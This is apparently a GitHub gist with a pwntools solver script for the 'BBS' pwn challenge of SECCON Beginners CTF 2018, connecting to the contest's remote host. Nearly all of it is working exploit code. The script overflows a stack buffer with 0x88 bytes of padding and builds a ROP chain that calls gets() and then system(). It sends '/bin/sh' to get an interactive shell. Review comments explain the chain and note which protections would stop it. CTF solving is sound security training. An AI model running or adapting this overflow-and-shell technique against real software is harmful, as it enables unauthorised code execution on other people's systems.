@hama7230
Created May 27, 2018 04:04
SECCON BeginnersCTF 2018 BBS
#!/usr/bin/env python
# SECCON Beginners CTF 2018 "BBS" solver built on pwntools.
# This top section only loads the challenge binary and fixes connection
# defaults; the option parsing and the payload itself follow further down.
# NOTE(review): the shebang and the str-based payload below suggest a
# Python 2 era pwntools — confirm before running under Python 3.
from pwn import *
context(terminal=['tmux', 'splitw', '-h']) # horizontal split window
# context(terminal=['tmux', 'new-window']) # open new window
# libc = ELF('')
# The challenge binary; its symbols (system/gets) are read from it below.
elf = ELF('./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7')
# Architecture is taken from the loaded ELF rather than hard-coded so the
# packing helpers match the target.
context(os='linux', arch=elf.arch)
context(log_level='debug') # output verbose log (every send/recv is echoed)
# Remote CTF service, selected with the 'r' option; 'l' uses the local pair.
RHOST = "pwn1.chall.beginners.seccon.jp"
RPORT = 18373
LHOST = "127.0.0.1"
LPORT = 18373
def section_addr(name, elf=elf):
    """Return the load address (``sh_addr``) of ELF section *name*.

    Looks the section up on the module-level ``elf`` unless a different
    ELF object is passed explicitly.
    """
    section = elf.get_section_by_name(name)
    return section.header['sh_addr']
def dbg(ss):
    """Log the value of the expression string *ss* in hex, tagged with the text of *ss*.

    ``ss`` is passed straight to ``eval()`` in this function's scope, so it is
    only meant for developer-typed expressions (e.g. a variable name) while
    debugging — never for anything received from outside the script.
    """
    value = eval(ss)
    log.info("%s: 0x%x" % (ss, value))
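conn = None
# First CLI argument picks the target: 'r' remote, 'l' local listener,
# 'd' run under gdb, 'a' spawn then attach gdb, anything else plain process.
opt = sys.argv.pop(1) if len(sys.argv) > 1 else '?' # pop option
if opt in ('r', 'l'):
    # Exact-match test: the former `opt in 'rl'` was a substring check, so an
    # empty argument or 'rl' got past it and then raised KeyError on the lookup.
    conn = remote(*{'r': (RHOST, RPORT), 'l': (LHOST, LPORT)}[opt])
elif opt == 'd':
    # Plain literal: the script has no '{}' placeholder, so formatting in the
    # main/entrypoint address was a no-op and has been dropped.
    gdbscript = """
set follow-fork-mode parent
continue
"""
    conn = gdb.debug(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'], gdbscript=gdbscript)
else:
    conn = process(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'])
    # conn = process(['./bbs_3e897818670a0db55eaed8109b6a73f0e03d54e7'], env={'LD_PRELOAD': ''})
    if opt == 'a': gdb.attach(conn)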
# exploit
# What this chain relies on (inferred from the payload shape, not shown on
# this page): a fixed-size stack buffer filled by an unbounded read, so the
# saved return address can be overwritten, and a binary loaded at a fixed
# address (every value below is absolute). TODO confirm the binary's
# protections. From a defender's view, any one of a stack canary, PIE for
# the main image, or a bounded read in place of gets() breaks this chain.
log.info('Pwning')
# 0x0000000000400763 : pop rdi ; ret
pop_rdi = 0x0000000000400763  # gadget inside the binary, per the line above
rw = 0x601300  # writable scratch address; presumably .data/.bss of the binary — not verified here
system_plt = elf.symbols['system']  # names suggest PLT stubs resolved via elf.symbols
gets_plt = elf.symbols['gets']
# Stage 1: gets(rw) stores the next line we send at the scratch address.
rop = p64(pop_rdi) + p64(rw) + p64(gets_plt)
# Stage 2: system(rw) on whatever stage 1 stored there.
rop += p64(pop_rdi) + p64(rw) + p64(system_plt)
# 0x88 bytes of padding reach the saved return address; that offset comes from
# the binary's frame layout and is not derivable from this script.
# NOTE(review): str + str concatenation assumes Python 2 pwntools — confirm.
conn.sendline('a'*0x88 + rop)
conn.sendline('/bin/sh\x00')  # consumed by the gets() queued in stage 1
conn.interactive()